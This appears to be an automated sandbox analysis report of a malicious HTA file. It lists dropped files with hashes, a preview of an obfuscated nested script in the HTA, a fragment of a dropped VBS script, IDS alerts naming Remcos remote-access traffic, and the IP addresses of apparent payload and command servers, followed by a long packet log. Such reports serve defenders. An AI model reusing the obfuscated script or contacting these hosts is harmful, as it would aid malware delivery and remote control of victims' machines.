                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5.....}.....}...........................".............. C.....P ......U.........[.....c.....j.....m.....w...U.....U...!.U.....U.......!.....*.......C.......................................,..........<Module>.p4

                                                              C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.out

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                              Category:modified
                                                              Size (bytes):870
                                                              Entropy (8bit):5.311498744044399
                                                              Encrypted:false
                                                              SSDEEP:24:KMoqd3ka6KzLE22Kax5DqBVKVrdFAMBJTH:doika6aLE22K2DcVKdBJj
                                                              MD5:BB1B0C743FFACF6FDB7EB58086B1CE99
                                                              SHA1:993B5A89B4FA21DE3267A480098B60903D2E7897
                                                              SHA-256:6B73481223FD581B35B080542EC796E48467C2B91C10A91FD2434E8ED1710CDA
                                                              SHA-512:D5FFD39EB3C55D1A10B52421C28EC8DA471AB853A80CB51D268CB6C68C286C966B5AB1371C9B9BB511ED27908A2B34B57858902C9EE3689FD8C7E5E30E714473
                                                              Malicious:false
                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                              C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):195824
                                                              Entropy (8bit):3.733217557919086
                                                              Encrypted:false
                                                              SSDEEP:3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
                                                              MD5:5A71149A9C997CDCB94F1A84860417F7
                                                              SHA1:9D80F853425AE99D844A70CEBAA59AEE73C537D1
                                                              SHA-256:FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
                                                              SHA-512:448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
                                                              Malicious:true
                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .a.l.m.e.c.e.g.u.e.i.r.a.(.f.l.u.c.t.u.a.d.o.r.,. .d.e.s.v.a.r.i.a.r.,. .m.i.l.i.c.i.a.n.o.,. .m.o.a.n.s.a.,. .h.e.m.i.a.t.r.o.p.h.i.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.

                                                              Static File Info

                                                              General

                                                              File type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                              Entropy (8bit):2.3094679199096855
                                                              TrID:
                                                              • HTML Application (8008/1) 100.00%
                                                              File name:na.hta
                                                              File size:167'898 bytes
                                                              MD5:52bb72daa6c16c09d4298bd59e12b7d9
                                                              SHA1:2e4aef7df584acaadb5a6e555d6e2f40ae12b6f1
                                                              SHA256:8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46
                                                              SHA512:1a6a1c54ceed1d004e32504bb473d2525dcff1974d8618af871252e4da7f3992ca87acc935a74f78cd6c14f172142ccfeee9bcb47104ea50a704fe37750d4ee4
                                                              SSDEEP:48:7oa+awjz7eWLB23EfAq6kfAKV6/HQ2UBW1++izpyHBfHLPy3JofufAYfAkhjQ/od:Ea+n7QbzVsdi9yOPtksVKLSAT
                                                              TLSH:C9F32796EA3148C8B7DC9E93BEFC738C3578931FA2CA5EA1939B7452DC2434C918481C
                                                              File Content Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520h

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-14T11:36:13.042897+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1185.199.111.133443192.168.2.549707TCP
                                                              2024-10-14T11:36:13.997130+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11192.3.220.4080192.168.2.549708TCP
                                                              2024-10-14T11:36:13.997130+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11192.3.220.4080192.168.2.549708TCP
                                                              2024-10-14T11:36:15.871804+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549714135.148.195.2486875TCP
                                                              2024-10-14T11:36:16.762466+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549722135.148.195.2486875TCP
                                                              2024-10-14T11:36:16.900244+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549723178.237.33.5080TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 14, 2024 11:36:01.362914085 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.371555090 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.371665955 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.371876001 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.377576113 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847358942 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847428083 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847436905 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.847465038 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847490072 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.847503901 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847537041 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847573042 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.847577095 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847603083 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.847609997 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847629070 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.847644091 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847671032 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.847750902 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.847861052 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847893953 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.847949028 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.852493048 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.852549076 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.852567911 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.852659941 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.852663040 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.852721930 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.936069012 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.936178923 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.936213017 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.936244965 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.936367035 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.936367035 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.940933943 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.941009998 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.941042900 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.941075087 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.941133976 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.941133976 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.941133976 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.941239119 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.941498041 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.946005106 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.946038961 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.946079969 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.946088076 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.946091890 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.946122885 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.946224928 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.951169968 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.951201916 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.951236963 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.951287031 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.951287031 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.951287031 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.951313972 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.951349974 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.951409101 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.951409101 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.956830978 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.956924915 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.956948042 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.956998110 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.957006931 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.957030058 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.957056046 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.957087040 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.961713076 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.961749077 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.961783886 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:01.961831093 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.961831093 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:01.961831093 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.025505066 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.025557995 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.025593042 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.025624990 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.025855064 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.030350924 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.030441046 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.030559063 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.030812979 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.030848026 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.030896902 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.030921936 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.035142899 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.035176039 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.035192013 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.035217047 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.035653114 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.035687923 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.035715103 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.035718918 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.035742044 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.035768032 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.039943933 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.039980888 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.040011883 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.040023088 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.040023088 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.040052891 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.040441036 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.040474892 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.040539980 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.044729948 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.044764996 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.044945955 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.045202971 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.045237064 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.045384884 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.045384884 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.049592972 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.049628019 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.049734116 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.050087929 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.050122976 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.050153971 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.050179005 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.050179005 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.050210953 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.054418087 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.054451942 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.054517984 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.054795980 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.054831028 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.054898024 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.054898024 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059530973 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059564114 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059596062 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059628010 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059659958 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059669971 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059669971 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059669971 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059694052 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059726954 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059760094 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059771061 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059771061 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059771061 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059793949 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059828043 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059843063 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059843063 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059860945 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059894085 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059916019 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.059930086 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.059952021 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.060008049 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116264105 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116338015 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116373062 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116406918 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116442919 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116451979 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116451979 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116451979 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116480112 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116502047 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116518021 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116532087 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116552114 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116605997 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116605997 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.116647959 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.116791010 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.117058039 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117110968 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117144108 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117187977 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.117187977 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.117187977 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.117294073 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117327929 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117353916 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.117444992 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.117857933 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117911100 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117943048 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.117969036 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.117969036 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.118058920 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.118093014 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.118148088 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.118148088 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.118685007 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.118757010 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.118789911 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.118817091 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.118817091 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.118837118 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.118868113 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.118902922 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.119052887 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.119052887 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.119549990 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.119601965 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.119633913 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.119668007 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.119668007 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.119668007 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.119721889 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.119755983 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.119776964 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.119848013 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.120359898 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.120405912 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.120438099 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.120485067 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.120485067 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.120485067 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.120559931 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.120594978 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.120682001 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.120682001 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121177912 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.121218920 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.121251106 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.121298075 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121298075 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121298075 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121418953 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.121454000 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.121607065 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121992111 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122067928 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122075081 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122102976 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122159958 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122159958 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122226000 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122258902 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122308016 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122308016 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122807980 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122881889 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122916937 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122934103 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123157978 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123235941 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123244047 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123317957 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123490095 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123542070 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123619080 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123652935 CEST8049706192.3.220.40192.168.2.5
